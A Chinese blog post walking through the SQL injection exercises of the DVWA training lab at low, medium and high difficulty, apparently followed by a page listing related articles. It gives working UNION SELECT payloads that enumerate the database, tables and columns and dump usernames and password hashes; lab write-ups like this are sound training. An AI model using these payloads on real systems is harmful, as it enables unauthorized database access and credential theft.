DVWA靶场—sql闯关

最新推荐文章于 2024-04-07 19:33:37 发布
最新推荐文章于 2024-04-07 19:33:37 发布
阅读量254 收藏
点赞数
分类专栏: sql注入 文章标签: 网络安全 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oiadkt/article/details/130317898
版权
本文详细介绍了三种不同难度级别的SQL注入攻击技术,从探测注入类型、测试列数,到利用UNIONSELECT获取数据库名、表名、列名,最终暴露用户敏感信息。在高难度场景中,还涉及了MD5加密密码的解密过程。
摘要由CSDN通过智能技术生成

部署靶场就不再赘述了,修改难度后自行开始闯关吧~

目录

LOW

Medium

High

LOW

  • 看到这种框框首先判断是什么类型的注入,先给个 ’ 进行探测,发现单引号会报错,但是双引号不会报错,所以闭合是 ' 号

  • 然后继续使用order by 探测列数,探测为2的时候显示正常,为3时就报错,所以确定列数是2列

 

  • 然后再使用联表查询,爆出数据库名,得到dvwa的数据库名
1' union select database(),2#

  • 再通过数据库名爆出表名,得到表guestbook和users;
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

  • 得到表名后再爆出列名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'#

  • 最后直接爆出username和password的字段信息
1' union select group_concat(user),group_concat(password) from users#

 

Medium

  • 看到这里感觉和pikachu的某一关很像,这里先抓包看看,感觉是个post请求

  • 先尝试给一个 引号 ,看看是否会报错,看到有斜杆,应该是被转译了

  • 尝试给了双引号,也会报错,通过之前的抓包分析,发现id选择可能都是数字,不是字符型的,或许不需要闭合

  • 去掉引号,直接使用 order by探测,发现是可以探测出来的,列数是两列

  • 直接使用 union select 查询数据库名
id=1 union select 1,database()&Submit=Submit

  • 接下来的步骤和上面一样,爆表名,列名,最后得到用户信息

High

  • 发现这关是带弹窗的,老办法,先使用1' 进行探测,发现报错

  • 再使用 1" 进行探测,发现页面恢复正常

  • 所以确认是 单引号闭合,先尝试直接order by 探测列数看是否可以探测

    order by 2显示正常

 order by 3显示报错

  • 探测出列数为两列,所以直接使用 union select 查询数据库名

  • 然后根据数据库名,爆出表名
 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

  • 根据数据库名和表名,爆出列名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'#

  • 最后联合重要的列名,和表名,爆出其中的数据
1' union select group_concat(user),group_concat(password) from users#

kukuromi
关注
专栏目录
SQL注入攻击的原理、分类和防御方法
Andrew的博客
02-27 2万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类型的注入 字符串类型的注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
DVWA靶场通关实战
qaq517384的博客
11-28 2522
Brute Force Command Injection CSRF File Inclusion File Upload Insecure CAPTCHA SQL Injection SQL Injection Weak Session IDs XSS (DOM) XSS(Reflected) XSS(Stored) CSP Bypass JavaScript
DVWA靶场SQL注入通关详解
qq_62169455的博客
06-27 3682
获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name='users')后,会发现报错了,原因是语句中含有单引号。
DVWA靶场SQL注入
剁椒鱼头没剁椒的博客
12-13 6434
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入。
DVWA靶场-sql注入(sqlInjection)
zeroone的博客
03-10 6066
第七关:SQL Injection       SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 Low <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[
DVWA靶场-SQL Injection SQL注入
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-06 1376
往期博文: DVWA靶场-Brute Force Source 暴力破解 DVWA靶场-Command Injection 命令注入 DVWA靶场-CSRF 跨站请求伪造 DVWA靶场-File Inclusion 文件包含 DVWA靶场-File Upload 文件上传 靶场环境搭建 https://github.com/ethicalhack3r/DVWA [网络安全学习篇附]:DVWA 靶场搭建 目录 SQL Injection Low SQL Injection..
基于dvwasql盲注(Blind)-低中高
滕财然的博客
11-15 2919
目录sql盲注和sql注入的区别sql盲注过程dvwa-SQL Injection (Blind) low级别布尔盲注时间盲注dvwa-SQL Injection (Blind) Medium级别dvwa-SQL Injection (Blind) High级别 sql盲注和sql注入的区别 盲注:目标只会回复是或不是,没有详细内容 注入:可以查看到详细内容 盲注分为:布尔盲注、时间盲注...
sql和xss等靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
DVWA low难度全通关
小明师傅博客
06-08 733
low难度 1.暴力破解 抓包 破解成功 2.命令执行 我们可以用通道符绕过 | &&也行 3.跨站请求伪造 这里把url发给登陆了的用户,就可以密码修改成功了 4.文件包含 通过这样来访问到phpinfo.php 5.文件上传 毫无防备 可以直接上传 6.不安全验证码 由于国内无法访问 GOOGLE,这个模块就不试了 7.SQL注入 sqlmap跑起 8.布尔型SQL注入 sqlmap跑起 9.Weak Session Ids 当用户登陆后,在服务器端就会
DVWA全级别通关教程
m0_67393295的博客
07-28 905
首先选择难度,我们从low开始,如上图所示进行修改目录SQL手工注入过程:lowMediumhighImpossible??SQL 盲注过程:SQL 工具注入工具安装过程:过程:?lowMediumHigh:暴力破解过程:LowMediumHighImpossible命令注入过程:LowMediumHigh:Impossible文件上传过程:LowMediumHighImpossibleXSS漏洞过程:Low(反射型)MediumHigh?ImpossibleLow(存储型)MediumHighImposs
DVWA靶场 -SQL注入-low
sanqin_的博客
05-17 507
先在输入框输入1看看结果是什么   在url测试常见的?id=1和 and1=1 , and1=2 和 ’and’1’=1 , ’and’1’=2 后页面无变化  因此直接选择在输入框进行简单测试操作 通常查询语句为:   Select * form 表名 where id=’xx’;   首先尝试输入单引号 ’ ,将引号合并让其报错,即输入后的语句为 Select * form 表名 where id=’ ’ ’;(假设是这个常见的查询语句) 输入结果:  页面报错,该页面可能存在注入漏洞  在输入框
DVWA靶场通关(SQL注入)
热门推荐
m0_56010012的博客
03-09 1万+
SQL Injection(SQL注入)概念 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入常规思路
Kali linux在DVWA靶场SQL注入
qq_74298120的博客
06-20 1959
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
DVWA靶场通关记录(SQL注入)
weixin_73557450的博客
05-13 1205
在MySQL中,自带的库为information_schema,其中包含MySQL中所有的数据库信息,包括所有库名、表名和列名。可以通过这个自带库获取信息。其中的表tables存储表名,表columns存储列名,通过句点“.”来连接上下级关系,例如:information_schema.tables。使用database()语句可以查询当前所在的数据库名称,user()可以查询当前登录的用户名。
DVWA综合靶场练习:SQL injection-低中高
流浪法师的博客
05-26 254
DVWA综合靶场练习:SQL injection-低中高
关于DVWA靶场SQL Injection(low,medium,high)代码分析及注入分析
qq_22792465的博客
06-10 606
下图为源码中提交表单action='#'的作用是将数据提交到当前页面。
dvwa靶场sql注入(low)
qq_14902381的博客
08-22 476
dvwa 靶场sql注入(low)
DVWA靶场SQL注入通关详解(1),【绝对干货
最新发布
m0_61549740的博客
04-07 1115
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
dvwa靶场sql注入
08-15
DVWA靶场中,SQL注入是其中一个常见的漏洞。 SQL注入是一种利用现有应用程序的漏洞,将恶意的SQL命令插入到Web表单提交或输入的查询字符串中,从而欺骗服务器执行恶意的SQL命令。攻击者可以利用SQL注入来绕过应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值